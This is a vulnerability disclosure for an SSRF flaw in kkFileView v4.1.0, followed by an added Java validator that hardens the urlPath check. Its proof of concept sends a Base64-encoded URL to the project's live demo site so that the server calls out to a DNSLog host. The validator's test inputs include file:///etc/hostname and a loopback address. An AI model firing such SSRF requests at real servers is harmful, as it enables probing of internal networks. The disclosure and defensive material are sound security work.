Problem description
kkFileView v4.1.0 has an SSRF vulnerability. An attacker can leverage it to cause Server-Side Request Forgery: a remote attacker can force the application to make arbitrary requests by injecting an arbitrary URL into the url parameter.
Vulnerable code location
The vulnerable code is cn.keking.web.controller.OnlinePreviewController#getCorsFile. The urlPath parameter is user-controllable, and the request is made without filtering special characters.
Proof of concept (PoC)
The official demo site runs the latest version, 4.1.0, so it is used for the demonstration. Access the vulnerable endpoint (the urlPath parameter value must be Base64-encoded):
https://file.keking.cn/getCorsFile?urlPath=aHR0cDovL3JlbW90ZS5ndGNoZWcuZG5zbG9nLmNu
DNSLog successfully received the request.
Repair suggestion: restrict the requested file suffix to pdf.
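The following is an added example of what a hardened check on the Base64-encoded urlPath value could look like before the server fetches it; it is not kkFileView's own code, and the class name, the `ALLOWED_HOSTS` allow-list and the sample inputs are assumptions for illustration. A suffix check on its own does not stop requests to loopback, intranet or cloud-metadata addresses, so the example combines the suggested ".pdf" restriction with a scheme allow-list, an optional host allow-list and a check on the resolved address.

```java
import java.net.InetAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.UnknownHostException;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.List;
import java.util.Locale;
import java.util.Set;

/** Validates a Base64-encoded urlPath before a server-side fetch (added example, not kkFileView code). */
public final class UrlPathValidator {

    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");

    // Hypothetical, deployment-specific allow-list of file hosts; empty means "any public host".
    private static final Set<String> ALLOWED_HOSTS = Set.of();

    private UrlPathValidator() {}

    /** Returns the validated URI or throws IllegalArgumentException with the reason for rejection. */
    public static URI validate(String urlPathBase64) throws UnknownHostException {
        byte[] raw;
        try {
            raw = Base64.getDecoder().decode(urlPathBase64);
        } catch (IllegalArgumentException e) {
            throw new IllegalArgumentException("urlPath is not valid Base64");
        }
        String url = new String(raw, StandardCharsets.UTF_8);

        URI uri;
        try {
            uri = new URI(url);
        } catch (URISyntaxException e) {
            throw new IllegalArgumentException("decoded urlPath is not a valid URI");
        }

        // 1. Only plain HTTP(S); file:, ftp:, gopher: and similar schemes are rejected.
        String scheme = uri.getScheme();
        if (scheme == null || !ALLOWED_SCHEMES.contains(scheme.toLowerCase(Locale.ROOT))) {
            throw new IllegalArgumentException("scheme not allowed: " + scheme);
        }

        // 2. A host must be present, must not carry user:pass@, and must pass the allow-list if one is set.
        String host = uri.getHost();
        if (host == null || uri.getUserInfo() != null) {
            throw new IllegalArgumentException("missing host or embedded credentials");
        }
        if (!ALLOWED_HOSTS.isEmpty() && !ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT))) {
            throw new IllegalArgumentException("host not on allow-list: " + host);
        }

        // 3. The suffix check from the repair suggestion, applied to the path component only,
        //    so a "?x=.pdf" query string cannot satisfy it.
        String path = uri.getPath();
        if (path == null || !path.toLowerCase(Locale.ROOT).endsWith(".pdf")) {
            throw new IllegalArgumentException("only .pdf paths may be previewed");
        }

        // 4. Defence in depth: refuse hosts that resolve to loopback, private, link-local or wildcard
        //    addresses, so the fetch cannot reach intranet services or cloud metadata endpoints.
        for (InetAddress addr : InetAddress.getAllByName(host)) {
            if (addr.isLoopbackAddress() || addr.isSiteLocalAddress()
                    || addr.isLinkLocalAddress() || addr.isAnyLocalAddress()) {
                throw new IllegalArgumentException("host resolves to a non-public address: " + addr);
            }
        }
        return uri;
    }

    private static String b64(String s) {
        return Base64.getEncoder().encodeToString(s.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) {
        // Constructed sample inputs, encoded the way the urlPath parameter expects.
        List<String> samples = List.of(
            b64("file:///etc/hostname"),                        // rejected: scheme
            b64("http://user:pw@files.example.org/a.pdf"),      // rejected: embedded credentials
            b64("https://files.example.org/report.docx"),       // rejected: suffix
            b64("http://127.0.0.1:8080/a.pdf"),                 // rejected: loopback address
            b64("https://files.example.org/report.pdf")         // accepted if the host resolves publicly
        );
        for (String s : samples) {
            try {
                System.out.println("accepted: " + validate(s));
            } catch (IllegalArgumentException | UnknownHostException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

Two points matter when wiring this into the actual fetch: the HTTP client must not follow redirects automatically (or must re-run the same validation on every redirect target), and because DNS can change between step 4 and the connection, the client should connect to the address that was validated rather than resolving the host a second time.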